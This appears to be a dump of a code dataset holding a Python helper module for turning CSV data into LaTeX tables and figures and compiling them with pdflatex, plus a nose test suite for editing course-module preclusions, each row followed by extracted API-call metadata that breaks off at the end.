code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from textwrap import dedent
import os
import subprocess
import numpy
import pandas
from wqio.tests import helpers
from wqio.utils import numutils
def _sig_figs(x):
""" Wrapper around `utils.sigFig` (n=3, tex=True) requiring only
argument for the purpose of easily "apply"-ing it to a pandas
dataframe.
"""
return numutils.sigFigs(x, n=3, tex=True)
def refresh_index(df):
""" gets around weird pandas block manager bugs that rise with
deeply nested indexes
"""
if isinstance(df.index, pandas.MultiIndex):
return df.reset_index().set_index(df.index.names)
else:
return df
def get_level_position(df, levelname):
_names = numpy.array(df.index.names)
ri, = numpy.nonzero(_names == levelname)
return ri[0]
def sanitizeTex(texstring):
""" Cleans up overly eager LaTeX renderings from pandas.
Parameters
----------
texstring : string
The string of LaTeX code to be cleaned up
Returns
-------
sanitized : string
Cleaned up LaTeX string.
"""
newstring = (
texstring.replace(r"\\%", r"\%")
.replace(r"\\", r"\tabularnewline")
.replace("\$", "$")
.replace("\_", "_")
.replace("ug/L", "\si[per-mode=symbol]{\micro\gram\per\liter}")
.replace(r"\textbackslashtimes", r"\times")
.replace(r"\textbackslash", "")
.replace(r"\textasciicircum", r"^")
.replace("\{", "{")
.replace("\}", "}")
)
return newstring
def csvToTex(
csvpath,
na_rep="--",
float_format=_sig_figs,
pcols=15,
addmidrules=None,
replaceTBrules=True,
replacestats=True,
):
""" Convert data in CSV format to a LaTeX table
Parameters
----------
csvpath : string
Full name and file path of the input data file.
na_rep : string, default "--"
How NA values should be written.
float_format : callable (default = `_sig_figs`)
Single input function that will return the correct
representation of floating point numbers.
pcols : int (default = 15)
Width of the columns for the LaTeX table.
addmidrules : string or list of strings, optional
(List of) string(s) to be replaced with "\midrule".
replaceTBrules : bool, default = True
When True, replaces "\toprule" and "\bottomrule" with
"\midrule".
replacestats : bool, default = True
When True, the labels of statistics are cleaned up a bit (e.g.,
"75%" -> "75th Percentile")
Returns
-------
None
"""
# read in the data pandas
data = pandas.read_csv(csvpath, parse_dates=False, na_values=[na_rep])
# open a new file and use pandas to dump the latex and close out
# with open(texpath, 'w') as texfile:
latex = data.to_latex(float_format=float_format, na_rep=na_rep, index=False)
if pcols > 0:
lines = []
header, rest_of_file = latex.split("\n", maxsplit=1)
# createa a bew header
header_sections = header.split("{")
old_col_def = header_sections[-1][:-1]
new_col_def = ""
for n in range(len(old_col_def)):
if n == 0:
new_col_def = new_col_def + "l"
new_col_def = new_col_def + "x{%smm}" % pcols
lines.append(header.replace(old_col_def, new_col_def))
if replaceTBrules:
rest_of_file = rest_of_file.replace("\\toprule", "\\midrule")
rest_of_file = rest_of_file.replace("\\bottomrule", "\\midrule")
if replacestats:
rest_of_file = rest_of_file.replace("std", "Std. Dev.")
rest_of_file = rest_of_file.replace("50\\%", "Median")
rest_of_file = rest_of_file.replace("25\\%", "25th Percentile")
rest_of_file = rest_of_file.replace("75\\%", "75th Percentile")
rest_of_file = rest_of_file.replace("count", "Count")
rest_of_file = rest_of_file.replace("mean", "Mean")
rest_of_file = rest_of_file.replace("min ", "Min. ")
rest_of_file = rest_of_file.replace("max", "Max.")
# XXX: omg hack
rest_of_file = rest_of_file.replace("AluMin.um", "Aluminum")
if addmidrules is not None:
if hasattr(addmidrules, "append"):
for amr in addmidrules:
rest_of_file = rest_of_file.replace(amr, "\\midrule\n%s" % amr)
else:
rest_of_file = rest_of_file.replace(amr, "\\midrule\n%s" % addmidrules)
lines.append(rest_of_file)
return sanitizeTex("\n".join(lines))
def csvToXlsx(csvpath, xlsxpath, na_rep="--", float_format=None):
""" Convert data in CSV format to an Excel workbook
Parameters
----------
csvpath : string
Full name and file path of the input data file.
xlsxpath : string
Full name and file path of the output .xlsx file.
na_rep : string (default = "--")
How NA values should be represented.
float_format : callable, optional
Single input function that will return the correct
representation of floating point numbers.
Returns
-------
None
"""
# read in the data pandas
data = pandas.read_csv(csvpath, parse_dates=False, na_values=[na_rep])
# use pandas to dump the excel file and close out
data.to_excel(xlsxpath, float_format=float_format, na_rep=na_rep, index=False)
def makeTexTable(
tablefile, caption, sideways=False, footnotetext=None, clearpage=False, pos="h!"
):
""" Creates a table block for a LaTeX document. Does not add it any
file.
Parameters
----------
tablefile : string
Name of the .tex file that actually contains the table.
caption : string
Caption/title that should be given to the table.
sideways : bool (default = False)
When True, a landscape table block is produced. Otherwise, the
table is in portrait mode.
footnotetext : string, optional
Any text that should be added as a footnote.
clearpage : bool (default = False)
When True, a "\clearpage" command is appended to the end of the
table block.
pos : string (default = "h!")
LaTeX float position specification. Default values tries its
best to place the table where the block appears in the LaTeX
document.
Returns
-------
tablestring : string
The table block text that can be -- but has not been -- added
to a LaTeX document.
"""
if sideways:
tabletype = "sidewaystable"
clearpage = True
else:
tabletype = "table"
if clearpage:
clearpagetext = r"\clearpage"
else:
clearpagetext = ""
if footnotetext is None:
notes = ""
else:
notes = footnotetext
tablestring = (
dedent(
r"""
\begin{%s}[%s]
\rowcolors{1}{CVCWhite}{CVCLightGrey}
\caption{%s}
\centering
\input{%s}
\end{%s}
%s
%s
"""
)
% (tabletype, pos, caption, tablefile, tabletype, notes, clearpagetext)
)
return tablestring
def makeLongLandscapeTexTable(df, caption, label, footnotetext=None, index=False):
""" Create a multi-page landscape label for a LaTeX document.
Parameters
----------
df : pandas.DataFrame
Dataframe to be turned into the table.
caption : string
Caption/title to be given to the table.
label : string
Unique identifier for references to table within LaTeX.
footnotetext : string, optional
Any text that should be added as a footnote.
index : bool (default = False)
Toggles the inclusion of the dataframe's index in to the table.
Default behavior omits it.
Returns
-------
tablestring : string
The table block text that can be -- but has not been -- added
to a LaTeX document.
"""
if footnotetext is None:
notes = ""
else:
notes = footnotetext
tabletexstring = df.to_latex(index=index, float_format=_sig_figs, na_rep="--")
valuelines = tabletexstring.split("\n")[4:-3]
valuestring = "\n".join(valuelines)
def _multicol_format(args):
n, col = args
if n == 0:
align = "l"
else:
align = "p{16mm}"
return r"\multicolumn{1}{%s}{%s}" % (align, col.replace("%", r"\%"))
dfcols = df.columns.tolist()
colalignlist = ["c"] * len(dfcols)
colalignlist[0] = "l"
colalignment = "".join(colalignlist)
col_enum = list(enumerate(dfcols))
columns = " &\n ".join(list(map(_multicol_format, col_enum)))
tablestring = (
dedent(
r"""
\begin{landscape}
\centering
\rowcolors{1}{CVCWhite}{CVCLightGrey}
\begin{longtable}{%s}
\caption{%s} \label{%s} \\
\toprule
%s \\
\toprule
\endfirsthead
\multicolumn{%d}{c}
{{\bfseries \tablename\ \thetable{} -- continued from previous page}} \\
\toprule
%s \\
\toprule
\endhead
\toprule
\rowcolor{CVCWhite}
\multicolumn{%d}{r}{{Continued on next page...}} \\
\bottomrule
\endfoot
\bottomrule
\endlastfoot
%s
\end{longtable}
\end{landscape}
%s
\clearpage
"""
)
% (
colalignment,
caption,
label,
columns,
len(dfcols),
columns,
len(dfcols),
valuestring,
notes,
)
)
return tablestring
def makeTexFigure(figFile, caption, pos="hb", clearpage=True):
""" Create the LaTeX for include a figure in a document. Does not
actually add it to any document.
Parameters
----------
figfile : string
Name of the image (.pdf) file that actually contains the figure.
caption : string
Caption/title that should be given to the table.
sideways : bool (default = False)
When True, a landscape table block is produced. Otherwise, the
table is in portrait mode.
footnotetext : string, optional
Any text that should be added as a footnote.
clearpage : bool (default = False)
When True, a "\clearpage" command is appended to the end of the
table block.
pos : string (default = "h!")
LaTeX float position specification. Default values tries its
best to place the table where the block appears in the LaTeX
document.
Returns
-------
tablestring : string
The table block text that can be -- but has not been -- added
to a LaTeX document.
"""
if clearpage:
clearpagetext = r"\clearpage"
else:
clearpagetext = ""
figurestring = (
dedent(
r"""
\begin{figure}[%s] %% FIGURE
\centering
\includegraphics[scale=1.00]{%s}
\caption{%s}
\end{figure} %% FIGURE
%s
"""
)
% (pos, figFile, caption, clearpagetext)
)
return figurestring
def processFilename(filename):
""" Sanitizes a filename for LaTeX. DON'T feed it a full path.
Parameters
----------
filename : string
The name of the file to be sanitized.
Returns
-------
sanitized : string
Mutated filename without characters that might cause errors in
LaTeX.
Example
-------
>>> processFilename('FigureBenzo/Inzo_1')
'FigureBenzoInzo1'
"""
badchars = [" ", ",", "+", "$", "_", "{", "}", "/", "&"]
fn = filename
for bc in badchars:
fn = fn.replace(bc, "")
return fn
def setMPLStyle(serif=False):
if serif:
fontfamily = "serif"
preamble = [
r"\usepackage{siunitx}",
r"\sisetup{detect-all}",
r"\usepackage{fourier}",
]
else:
fontfamily = "sans-serif"
preamble = [
r"\usepackage{siunitx}",
r"\sisetup{detect-all}",
r"\usepackage{helvet}",
r"\usepackage{sansmath}",
r"\sansmath",
]
style_dict = {
"text.usetex": True,
"font.family": [fontfamily],
"font.serif": ["Utopia", "Palantino"],
"font.sans-serif": ["Helvetica", "Arial"],
"lines.linewidth": 0.5,
"patch.linewidth": 0.5,
"text.latex.preamble": preamble,
"axes.linewidth": 0.5,
"axes.grid": True,
"axes.titlesize": 12,
"axes.labelsize": 10,
"xtick.labelsize": 10,
"xtick.direction": "out",
"ytick.labelsize": 10,
"ytick.direction": "out",
"grid.linewidth": 0.5,
"legend.fancybox": True,
"legend.numpoints": 1,
"legend.fontsize": 8,
"figure.figsize": (6.5, 3.5),
"savefig.dpi": 300,
}
matplotlib.rcParams.update(style_dict)
class LaTeXDirectory(object):
""" Context manager to help compile latex docs from python.
Switches to the latex document's folder and remains there while
inside the manager. The present working directory is restored once
the context manager exits.
Parameters
----------
texpath : string
The LaTeX source file or the directory in which it is found.
"""
def __init__(self, texpath):
self.home = os.getcwd()
if os.path.isfile(texpath):
self.texpath = os.path.dirname(texpath)
else:
self.texpath = texpath
def __enter__(self):
os.chdir(self.texpath)
return self
def __exit__(self, *args):
os.chdir(self.home)
def compile(self, texdoc, clean=False):
""" Compile a LaTeX document inside the context manager
Parameters
----------
texdoc : string
File name of a .tex file in the LaTeX directory
clean : bool (default = False)
When True, all of non-PDF files resulting from compilation
are removed. By default, they are left on the file system.
Returns
-------
tex : int or None
The status (1 or 0) of the compilation. If LaTeX is not
available, None is returned.
"""
if helpers.checkdep_tex() is not None:
# use ``pdflatex`` to compile the document
tex = subprocess.call(
["pdflatex", texdoc, "--quiet"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
)
if clean:
extensions = ["aux", "log", "nav", "out", "snm", "toc"]
for ext in extensions:
junkfiles = glob.glob("*.{}".format(ext))
for junk in junkfiles:
os.remove(junk)
else:
tex = None
return tex
| [
"textwrap.dedent",
"wqio.utils.numutils.sigFigs",
"pandas.read_csv",
"os.getcwd",
"os.path.isfile",
"numpy.array",
"os.chdir",
"os.path.dirname",
"wqio.tests.helpers.checkdep_tex",
"subprocess.call",
"numpy.nonzero",
"os.remove"
] | [((338, 372), 'wqio.utils.numutils.sigFigs', 'numutils.sigFigs', (['x'], {'n': '(3)', 'tex': '(True)'}), '(x, n=3, tex=True)\n', (354, 372), False, 'from wqio.utils import numutils\n'), ((687, 714), 'numpy.array', 'numpy.array', (['df.index.names'], {}), '(df.index.names)\n', (698, 714), False, 'import numpy\n'), ((725, 759), 'numpy.nonzero', 'numpy.nonzero', (['(_names == levelname)'], {}), '(_names == levelname)\n', (738, 759), False, 'import numpy\n'), ((2622, 2685), 'pandas.read_csv', 'pandas.read_csv', (['csvpath'], {'parse_dates': '(False)', 'na_values': '[na_rep]'}), '(csvpath, parse_dates=False, na_values=[na_rep])\n', (2637, 2685), False, 'import pandas\n'), ((5234, 5297), 'pandas.read_csv', 'pandas.read_csv', (['csvpath'], {'parse_dates': '(False)', 'na_values': '[na_rep]'}), '(csvpath, parse_dates=False, na_values=[na_rep])\n', (5249, 5297), False, 'import pandas\n'), ((6862, 7048), 'textwrap.dedent', 'dedent', (['"""\n \\\\begin{%s}[%s]\n \\\\rowcolors{1}{CVCWhite}{CVCLightGrey}\n \\\\caption{%s}\n \\\\centering\n \\\\input{%s}\n \\\\end{%s}\n %s\n %s\n """'], {}), '(\n """\n \\\\begin{%s}[%s]\n \\\\rowcolors{1}{CVCWhite}{CVCLightGrey}\n \\\\caption{%s}\n \\\\centering\n \\\\input{%s}\n \\\\end{%s}\n %s\n %s\n """\n )\n', (6868, 7048), False, 'from textwrap import dedent\n'), ((8726, 9521), 'textwrap.dedent', 'dedent', (['"""\n \\\\begin{landscape}\n \\\\centering\n \\\\rowcolors{1}{CVCWhite}{CVCLightGrey}\n \\\\begin{longtable}{%s}\n \\\\caption{%s} \\\\label{%s} \\\\\\\\\n \\\\toprule\n %s \\\\\\\\\n \\\\toprule\n \\\\endfirsthead\n\n \\\\multicolumn{%d}{c}\n {{\\\\bfseries \\\\tablename\\\\ \\\\thetable{} -- continued from previous page}} \\\\\\\\\n \\\\toprule\n %s \\\\\\\\\n \\\\toprule\n \\\\endhead\n\n \\\\toprule\n \\\\rowcolor{CVCWhite}\n \\\\multicolumn{%d}{r}{{Continued on next page...}} \\\\\\\\\n \\\\bottomrule\n \\\\endfoot\n\n \\\\bottomrule\n \\\\endlastfoot\n\n %s\n\n \\\\end{longtable}\n \\\\end{landscape}\n %s\n \\\\clearpage\n """'], {}), '(\n """\n \\\\begin{landscape}\n \\\\centering\n \\\\rowcolors{1}{CVCWhite}{CVCLightGrey}\n \\\\begin{longtable}{%s}\n \\\\caption{%s} \\\\label{%s} \\\\\\\\\n \\\\toprule\n %s \\\\\\\\\n \\\\toprule\n \\\\endfirsthead\n\n \\\\multicolumn{%d}{c}\n {{\\\\bfseries \\\\tablename\\\\ \\\\thetable{} -- continued from previous page}} \\\\\\\\\n \\\\toprule\n %s \\\\\\\\\n \\\\toprule\n \\\\endhead\n\n \\\\toprule\n \\\\rowcolor{CVCWhite}\n \\\\multicolumn{%d}{r}{{Continued on next page...}} \\\\\\\\\n \\\\bottomrule\n \\\\endfoot\n\n \\\\bottomrule\n \\\\endlastfoot\n\n %s\n\n \\\\end{longtable}\n \\\\end{landscape}\n %s\n \\\\clearpage\n """\n )\n', (8732, 9521), False, 'from textwrap import dedent\n'), ((10962, 11154), 'textwrap.dedent', 'dedent', (['"""\n \\\\begin{figure}[%s] %% FIGURE\n \\\\centering\n \\\\includegraphics[scale=1.00]{%s}\n \\\\caption{%s}\n \\\\end{figure} %% FIGURE\n %s\n """'], {}), '(\n """\n \\\\begin{figure}[%s] %% FIGURE\n \\\\centering\n \\\\includegraphics[scale=1.00]{%s}\n \\\\caption{%s}\n \\\\end{figure} %% FIGURE\n %s\n """\n )\n', (10968, 11154), False, 'from textwrap import dedent\n'), ((13521, 13532), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (13530, 13532), False, 'import os\n'), ((13544, 13567), 'os.path.isfile', 'os.path.isfile', (['texpath'], {}), '(texpath)\n', (13558, 13567), False, 'import os\n'), ((13704, 13726), 'os.chdir', 'os.chdir', (['self.texpath'], {}), '(self.texpath)\n', (13712, 13726), False, 'import os\n'), ((13787, 13806), 'os.chdir', 'os.chdir', (['self.home'], {}), '(self.home)\n', (13795, 13806), False, 'import os\n'), ((13596, 13620), 'os.path.dirname', 'os.path.dirname', (['texpath'], {}), '(texpath)\n', (13611, 13620), False, 'import os\n'), ((14413, 14435), 'wqio.tests.helpers.checkdep_tex', 'helpers.checkdep_tex', ([], {}), '()\n', (14433, 14435), False, 'from wqio.tests import helpers\n'), ((14522, 14635), 'subprocess.call', 'subprocess.call', (["['pdflatex', texdoc, '--quiet']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'shell': '(False)'}), "(['pdflatex', texdoc, '--quiet'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, shell=False)\n", (14537, 14635), False, 'import subprocess\n'), ((14974, 14989), 'os.remove', 'os.remove', (['junk'], {}), '(junk)\n', (14983, 14989), False, 'import os\n')] |
'''
test_edit_preclusion_backend.py
Contains test cases for functions to edit preclusions.
'''
from nose.tools import assert_equal, assert_false, assert_true
from components import model
# HOW TO RUN NOSE TESTS
# 1. Make sure you are in cs-modify main directory
# 2. Make sure the path "C:\Python27\Scripts" is added in your environment variables
# 3. Enter in cmd: "nosetests test/"
# 4. Nose will run all the tests inside the test/ folder
class TestCode(object):
'''
This class runs the test cases for functions to edit preclusions.
'''
def __init__(self):
self.test_module_code = "AA1111"
self.test_module_name = "Dummy Module"
self.test_module_desc = "Dummy Description"
self.test_module_mc = 4
self.test_module_status = "Active"
self.no_preclude_to_one_preclude_tested = False
self.no_preclude_to_no_preclude_tested = False
self.no_preclude_to_multiple_preclude_tested = False
self.preclude_to_one_preclude_tested = False
self.preclude_to_no_preclude_tested = False
self.preclude_to_multiple_preclude_tested = False
self.edit_preclude_duplicate_tested = False
self.edit_preclude_non_existent_tested = False
self.edit_preclude_already_in_prereq = False
self.edit_preclude_multiple_errors_tested = False
self.test_preclude_code = "BB1111"
self.test_preclude2_code = "BB1112"
self.test_preclude3_code = "BB1113"
self.test_invalid_module_code = "ZZ1597"
self.ERROR_MSG_MODULE_CANNOT_BE_ITSELF = "This module cannot be the same as target module"
self.ERROR_MSG_MODULE_DUPLICATED = "There cannot be more than one instance of this module"
self.ERROR_MSG_MODULE_DOESNT_EXIST = "This module does not exist"
self.ERROR_MSG_MODULE_PRECLUSION_ALREADY_PREREQ = \
"This module is a prerequisite of the target module"
def setUp(self):
'''
Populate database and perform testing
'''
model.add_module(self.test_module_code, self.test_module_name, self.test_module_desc,
self.test_module_mc, self.test_module_status)
model.add_module(self.test_preclude_code, self.test_module_name, self.test_module_desc,
self.test_module_mc, self.test_module_status)
model.add_module(self.test_preclude2_code, self.test_module_name, self.test_module_desc,
self.test_module_mc, self.test_module_status)
model.add_module(self.test_preclude3_code, self.test_module_name, self.test_module_desc,
self.test_module_mc, self.test_module_status)
self.test_no_preclude_to_one_preclude()
self.no_preclude_to_one_preclude_tested = True
self.test_preclude_to_one_preclude()
self.preclude_to_one_preclude_tested = True
self.test_no_preclude_to_no_preclude()
self.no_preclude_to_no_preclude_tested = True
self.test_preclude_to_no_preclude()
self.preclude_to_no_preclude_tested = True
self.test_no_preclude_to_multiple_preclude()
self.no_preclude_to_multiple_preclude_tested = True
self.test_preclude_to_multiple_preclude()
self.preclude_to_multiple_preclude_tested = True
self.test_edit_preclude_duplicate_modules()
self.edit_preclude_duplicate_tested = True
self.test_edit_preclude_non_existent_modules()
self.edit_preclude_non_existent_tested = True
self.test_edit_preclude_already_in_prereq()
self.edit_preclude_already_in_prereq = True
self.test_edit_preclude_multiple_errors()
self.edit_preclude_multiple_errors_tested = True
def tearDown(self):
'''
Clean up the database after all test cases are ran
'''
model.delete_module(self.test_module_code)
model.delete_module(self.test_preclude_code)
model.delete_module(self.test_preclude2_code)
model.delete_module(self.test_preclude3_code)
def test_no_preclude_to_one_preclude(self):
'''
Tests editing preclusion on a module originally with no preclude
to 1 preclude.
'''
if not self.no_preclude_to_one_preclude_tested:
preclude_units_to_change_to = [self.test_preclude_code]
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_true(outcome[0])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_equal(len(preclude_info), 1)
assert_equal(self.test_preclude_code, preclude_info[0][0])
model.delete_all_preclusions(self.test_module_code)
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(len(preclude_info) == 0)
return
def test_preclude_to_one_preclude(self):
'''
Tests editing preclusion on a module to 1 preclude.
'''
if not self.preclude_to_one_preclude_tested:
model.add_preclusion(self.test_module_code, self.test_preclude_code)
preclude_units_to_change_to = [self.test_preclude2_code]
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_true(outcome[0])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_equal(len(preclude_info), 1)
assert_equal(self.test_preclude2_code, preclude_info[0][0])
model.delete_all_preclusions(self.test_module_code)
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(len(preclude_info) == 0)
return
def test_no_preclude_to_no_preclude(self):
'''
Tests editing preclusion on a module originally with no preclude
to no preclude.
'''
if not self.no_preclude_to_no_preclude_tested:
preclude_units_to_change_to = []
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_true(outcome[0])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_true(len(preclude_info) == 0)
return
def test_preclude_to_no_preclude(self):
'''
Tests editing preclusion on a module to no preclude.
'''
if not self.preclude_to_no_preclude_tested:
model.add_preclusion(self.test_module_code, self.test_preclude_code)
preclude_units_to_change_to = []
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_true(outcome[0])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_true(len(preclude_info) == 0)
return
def test_no_preclude_to_multiple_preclude(self):
'''
Tests editing preclusion on a module originally with no preclude
to multiple precludes.
'''
if not self.no_preclude_to_multiple_preclude_tested:
preclude_units_to_change_to = [self.test_preclude_code,
self.test_preclude2_code, self.test_preclude3_code]
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_true(outcome[0])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_equal(len(preclude_info), 3)
assert_equal(self.test_preclude_code, preclude_info[0][0])
assert_equal(self.test_preclude2_code, preclude_info[1][0])
assert_equal(self.test_preclude3_code, preclude_info[2][0])
model.delete_all_preclusions(self.test_module_code)
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(len(preclude_info) == 0)
return
def test_preclude_to_multiple_preclude(self):
'''
Tests editing preclusion on a module to multiple preclude.
'''
if not self.preclude_to_multiple_preclude_tested:
model.add_preclusion(self.test_module_code, self.test_preclude_code)
preclude_units_to_change_to = [self.test_preclude_code,
self.test_preclude2_code, self.test_preclude3_code]
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_true(outcome[0])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_equal(len(preclude_info), 3)
assert_equal(self.test_preclude_code, preclude_info[0][0])
assert_equal(self.test_preclude2_code, preclude_info[1][0])
assert_equal(self.test_preclude3_code, preclude_info[2][0])
model.delete_all_preclusions(self.test_module_code)
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(len(preclude_info) == 0)
return
def test_edit_preclude_duplicate_modules(self):
'''
Tests editing preclusion on a module to precludes with duplicates,
note: this test case should fail to edit.
'''
if not self.edit_preclude_duplicate_tested:
model.add_preclusion(self.test_module_code, self.test_preclude_code)
preclude_units_to_change_to = [self.test_preclude2_code,
self.test_preclude2_code]
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_false(outcome[0])
error_list = outcome[1]
assert_equal(len(error_list), 1)
assert_equal(error_list[0],
[self.test_preclude2_code, self.ERROR_MSG_MODULE_DUPLICATED])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_equal(self.test_preclude_code, preclude_info[0][0])
model.delete_all_preclusions(self.test_module_code)
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(len(preclude_info) == 0)
def test_edit_preclude_non_existent_modules(self):
'''
Tests editing preclusion on a module to precludes which does
not exist, note: this test case should fail to edit.
'''
if not self.edit_preclude_non_existent_tested:
model.add_preclusion(self.test_module_code, self.test_preclude_code)
preclude_units_to_change_to = [self.test_preclude2_code,
self.test_invalid_module_code]
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_false(outcome[0])
error_list = outcome[1]
assert_equal(len(error_list), 1)
assert_equal(error_list[0],
[self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_equal(self.test_preclude_code, preclude_info[0][0])
model.delete_all_preclusions(self.test_module_code)
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(len(preclude_info) == 0)
# Test another form
model.add_preclusion(self.test_module_code, self.test_preclude_code)
preclude_units_to_change_to = [self.test_invalid_module_code,
self.test_preclude2_code]
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_false(outcome[0])
error_list = outcome[1]
assert_equal(len(error_list), 1)
assert_equal(error_list[0],
[self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_equal(self.test_preclude_code, preclude_info[0][0])
model.delete_all_preclusions(self.test_module_code)
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(len(preclude_info) == 0)
return
def test_edit_preclude_already_in_prereq(self):
'''
Tests editing preclusion on a module to precludes which already
exists as a prerequisite to that module.
Note: this test case should fail to edit.
'''
if not self.edit_preclude_non_existent_tested:
model.add_prerequisite(self.test_module_code, self.test_preclude_code,
0)
preclude_units_to_change_to = [self.test_preclude_code]
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_false(outcome[0])
error_list = outcome[1]
assert_equal(len(error_list), 1)
assert_equal(error_list[0],
[self.test_preclude_code, self.ERROR_MSG_MODULE_PRECLUSION_ALREADY_PREREQ])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_true(len(preclude_info) == 0)
model.delete_all_prerequisites(self.test_module_code)
prereq_info = model.get_prerequisite(self.test_module_code)
assert_true(len(prereq_info) == 0)
def test_edit_preclude_multiple_errors(self):
'''
Tests editing preclusion on a module to precludes with multiple
errors.
Note: this test case should fail to edit.
'''
if not self.edit_preclude_multiple_errors_tested:
model.add_preclusion(self.test_module_code, self.test_preclude_code)
preclude_units_to_change_to = [self.test_module_code,
self.test_invalid_module_code]
outcome = model.edit_preclusion(self.test_module_code, preclude_units_to_change_to)
assert_false(outcome[0])
error_list = outcome[1]
assert_equal(len(error_list), 2)
assert_equal(error_list[0],
[self.test_module_code, self.ERROR_MSG_MODULE_CANNOT_BE_ITSELF])
assert_equal(error_list[1],
[self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST])
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(preclude_info is not None)
assert_equal(self.test_preclude_code, preclude_info[0][0])
model.delete_all_preclusions(self.test_module_code)
preclude_info = model.get_preclusion(self.test_module_code)
assert_true(len(preclude_info) == 0)
| [
"components.model.add_preclusion",
"components.model.add_module",
"components.model.get_prerequisite",
"components.model.get_preclusion",
"components.model.delete_module",
"components.model.edit_preclusion",
"components.model.add_prerequisite",
"nose.tools.assert_true",
"components.model.delete_all_... | [((2043, 2179), 'components.model.add_module', 'model.add_module', (['self.test_module_code', 'self.test_module_name', 'self.test_module_desc', 'self.test_module_mc', 'self.test_module_status'], {}), '(self.test_module_code, self.test_module_name, self.\n test_module_desc, self.test_module_mc, self.test_module_status)\n', (2059, 2179), False, 'from components import model\n'), ((2208, 2346), 'components.model.add_module', 'model.add_module', (['self.test_preclude_code', 'self.test_module_name', 'self.test_module_desc', 'self.test_module_mc', 'self.test_module_status'], {}), '(self.test_preclude_code, self.test_module_name, self.\n test_module_desc, self.test_module_mc, self.test_module_status)\n', (2224, 2346), False, 'from components import model\n'), ((2375, 2514), 'components.model.add_module', 'model.add_module', (['self.test_preclude2_code', 'self.test_module_name', 'self.test_module_desc', 'self.test_module_mc', 'self.test_module_status'], {}), '(self.test_preclude2_code, self.test_module_name, self.\n test_module_desc, self.test_module_mc, self.test_module_status)\n', (2391, 2514), False, 'from components import model\n'), ((2543, 2682), 'components.model.add_module', 'model.add_module', (['self.test_preclude3_code', 'self.test_module_name', 'self.test_module_desc', 'self.test_module_mc', 'self.test_module_status'], {}), '(self.test_preclude3_code, self.test_module_name, self.\n test_module_desc, self.test_module_mc, self.test_module_status)\n', (2559, 2682), False, 'from components import model\n'), ((3863, 3905), 'components.model.delete_module', 'model.delete_module', (['self.test_module_code'], {}), '(self.test_module_code)\n', (3882, 3905), False, 'from components import model\n'), ((3914, 3958), 'components.model.delete_module', 'model.delete_module', (['self.test_preclude_code'], {}), '(self.test_preclude_code)\n', (3933, 3958), False, 'from components import model\n'), ((3967, 4012), 'components.model.delete_module', 'model.delete_module', (['self.test_preclude2_code'], {}), '(self.test_preclude2_code)\n', (3986, 4012), False, 'from components import model\n'), ((4021, 4066), 'components.model.delete_module', 'model.delete_module', (['self.test_preclude3_code'], {}), '(self.test_preclude3_code)\n', (4040, 4066), False, 'from components import model\n'), ((4391, 4464), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (4412, 4464), False, 'from components import model\n'), ((4478, 4501), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (4489, 4501), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((4531, 4574), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (4551, 4574), False, 'from components import model\n'), ((4587, 4625), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (4598, 4625), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((4686, 4744), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (4698, 4744), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((4758, 4809), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (4786, 4809), False, 'from components import model\n'), ((4839, 4882), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (4859, 4882), False, 'from components import model\n'), ((5151, 5219), 'components.model.add_preclusion', 'model.add_preclusion', 